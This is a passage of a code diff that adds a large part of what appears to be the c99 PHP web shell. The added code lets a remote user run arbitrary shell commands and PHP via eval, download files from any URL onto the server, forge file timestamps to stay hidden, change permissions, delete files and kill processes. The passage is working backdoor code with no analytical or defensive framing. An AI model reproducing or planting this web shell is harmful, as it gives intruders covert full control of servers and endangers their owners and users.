+<br><br><input type=submit name=submit value=\"Search\"></form>";
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $mode = fileperms($d.$f);
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+ else
+ {
+  $form = TRUE;
+  if ($chmod_submit)
+  {
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
+   else {$err = "Can't chmod to ".$octet.".";}
+  }
+  if ($form)
+  {
+   $perms = parse_perms($mode);
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+  }
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile["tmp_name"]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"].". Can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\".</br></br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=submit name=submit value=\"Upload\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = FALSE;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+ }
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+ $act = "ls";
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+  $cmdline .= " ".$actarcbuff_path;
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+   if (is_dir($v))
+   {
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $tmp = realpath(".");
+  chdir($d);
+  $ret = myshellexec($cmdline);
+  chdir($tmp);
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+  $ret = str_replace("\r\n","\n",$ret);
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "cmd")
+{
+if (trim($cmd) == "ps aux") {$act = "processes";}
+elseif (trim($cmd) == "tasklist") {$act = "processes";}
+else
+{
+ @chdir($chdir);
+ if (!empty($submit))
+ {
+  $execcmd = $_REQUEST['cmd'];
+  echo "Result Of Locally Executed Command: <b>$execcmd</b></br>";
+  $olddir = realpath(".");
+  @chdir($d);
+  $ret = myshellexec($cmd);
+  $ret = convert_cyr_string($ret,"d","w");
+  if ($cmd_txt)
+  {
+   $rows = count(explode("\r\n",$ret))+1;
+   if ($rows < 10) {$rows = 10;}
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+  }
+  else {echo $ret."<br>";}
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+   closedir($h);
+  }
+  else {}
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open folder ".htmlspecialchars($d)."</b></center>";}
+ else
+ {
+  //Building array
+  $objects = array();
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $objects["head"] = array();
+   $objects["folders"] = array();
+   $objects["links"] = array();
+   $objects["files"] = array();
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $row = array();
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$type = "LINK";}
+     else {$type = "DIR";}
+     $row[] = $v;
+     $row[] = $type;
+    }
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+    $row[] = filemtime($v);
+    if (!$win)
+    {
+     $ow = posix_getpwuid(fileowner($v));
+     $gr = posix_getgrgid(filegroup($v));
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+    }
+    $row[] = fileperms($v);
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+    elseif (is_link($v)) {$objects["links"][] = $row;}
+    elseif (is_dir($v)) {$objects["folders"][] = $row;}
+    elseif (is_file($v)) {$objects["files"][] = $row;}
+    $i++;
+   }
+   $row = array();
+   $row[] = "<b>Name</b>";
+   $row[] = "<b>Size</b>";
+   $row[] = "<b>Modify</b>";
+   if (!$win)
+  {$row[] = "<b>Owner/Group</b>";}
+   $row[] = "<b>Perms</b>";
+   $row[] = "<b>Action</b>";
+   $parsesort = parsesort($sort);
+   $sort = $parsesort[0].$parsesort[1];
+   $k = $parsesort[0];
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
+   $y .= "[Sort-".($parsesort[1] == "a"?"Asc.":"Desc")."]</a>";
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
+   }
+   $v = $parsesort[0];
+   usort($objects["folders"], "tabsort");
+   usort($objects["links"], "tabsort");
+   usort($objects["files"], "tabsort");
+   if ($parsesort[1] == "d")
+   {
+    $objects["folders"] = array_reverse($objects["folders"]);
+    $objects["files"] = array_reverse($objects["files"]);
+   }
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+   $tab = array();
+   $tab["cols"] = array($row);
+   $tab["head"] = array();
+   $tab["folders"] = array();
+   $tab["links"] = array();
+   $tab["files"] = array();
+   $i = 0;
+   foreach ($objects as $a)
+   {
+    $v = $a[0];
+    $o = basename($v);
+    $dir = dirname($v);
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+    foreach ($regxp_highlight as $r)
+    {
+     if (ereg($r[0],$o))
+     {
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();}
+      else
+      {
+       $r[1] = round($r[1]);
+       $isdir = is_dir($v);
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
+       {
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+        $disppath = $r[2].$disppath.$r[3];
+        if ($r[4]) {break;}
+       }
+      }
+     }
+    }
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+    $row = array();
+    if ($o == ".")
+    {
+     $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v))
+     {
+      $disppath .= " => ".readlink($v);
+      $type = "LINK";
+      $row[] =  "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+     }
+     else
+     {
+      $type = "DIR";
+      $row[] =  "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+      }
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
+     $row[] = view_size($a[1]);
+    }
+    $row[] = date("d.m.Y H:i:s",$a[2]);
+    if (!$win) {$row[] = $a[3];}
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\">[Info]</a>&nbsp;".$checkbox;}
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\">[Info]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\">[Change]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\">[Download]</a>&nbsp;".$checkbox;}
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+    elseif (is_link($v)) {$tab["links"][] = $row;}
+    elseif (is_dir($v)) {$tab["folders"][] = $row;}
+    elseif (is_file($v)) {$tab["files"][] = $row;}
+    $i++;
+   }
+  }
+  // Compiling table
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+  echo "<center><b><u>Listing Folder: ".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders</u></b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
+  echo "</table><hr size=\"1\" noshade><p align=\"right\">
+  <script>
+  function ls_setcheckboxall(status)
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = status;
+    id++;
+   }
+  }
+  function ls_reverse_all()
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
+    id++;
+   }
+  }
+  </script>
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> 
+  <b>";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>";
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+  }
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
+  echo "</form>";
+ }
+}
+
+if ($act == "processes")
+{
+ echo "<b>Processes:</b><br>";
+ if (!$win) {$handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":"");}
+ else {$handler = "tasklist";}
+ $ret = myshellexec($handler);
+ if (!$ret) {echo "</br>Can't execute \"".$handler."\"!";}
+ else
+ {
+  if (empty($processes_sort)) {$processes_sort = $sort_default;}
+  $parsesort = parsesort($processes_sort);
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+  $k = $parsesort[0];
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";}
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";}
+  $ret = htmlspecialchars($ret);
+  if (!$win)
+  {
+   if ($pid)
+   {
+    if (is_null($sig)) {$sig = 9;}
+    echo "Sending signal ".$sig." to #".$pid."... ";
+    if (posix_kill($pid,$sig)) {echo "OK.";}
+    else {echo "ERROR.";}
+   }
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+{
+ echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10));
+     $line = array_slice($line,0,11);
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  else
+  {
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+   $ret = convert_cyr_string($ret,"d","w");
+   $stack = explode("\n",$ret);
+   unset($stack[0],$stack[2]);
+   $stack = array_values($stack);
+   $head = explode("",$stack[0]);
+   $head[1] = explode(" ",$head[1]);
+   $head[1] = $head[1][0];
+   $stack = array_slice($stack,1);
+   unset($head[2]);
+   $head = array_values($head);
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";}
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";}
+   if ($k > count($head)) {$k = count($head)-1;}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+    {
+     echo "<tr>";
+     $line = explode("",$line);
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024; 
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  $head[$k] = "<b>".$head[$k]."</b>".$y;
+  $v = $processes_sort[0];
+  usort($prcs,"tabsort");
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+  $tab = array();
+  $tab[] = $head;
+  $tab = array_merge($tab,$prcs);
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+  foreach($tab as $i=>$k)
+  {
+   echo "<tr>";
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
+   echo "</tr>";
+  }
+  echo "</table>";
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Result of execution this PHP-code</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("\r\n",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret."<br>";}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $r = @file_get_contents($d.$f);
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+   array("[hex]","info"),
+   array("[html]","html"),
+   array("[txt]","txt"),
+   array("[Code]","code"),
+   array("[Session]","phpsess"),
+   array("[exe]","exe"),
+   array("[SDB]","sdb"),
+   array("[gif]","img"),
+   array("[ini]","ini"),
+   array("[download]","download"),
+   array("[rtf]","notepad"),
+   array("[change]","edit")
+  );
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;[$ext]&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr><td><b>Owner/Group</b></td><td> ";    
+    $ow = posix_getpwuid(fileowner($d.$f));
+    $gr = posix_getgrgid(filegroup($d.$f));
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+   }
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+    $n = 0;
+    $a0 = "00000000<br>";
+    $a1 = "";
+    $a2 = "";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1 .= sprintf("%02X",ord($str[$i]))." ";
+     switch (ord($str[$i]))
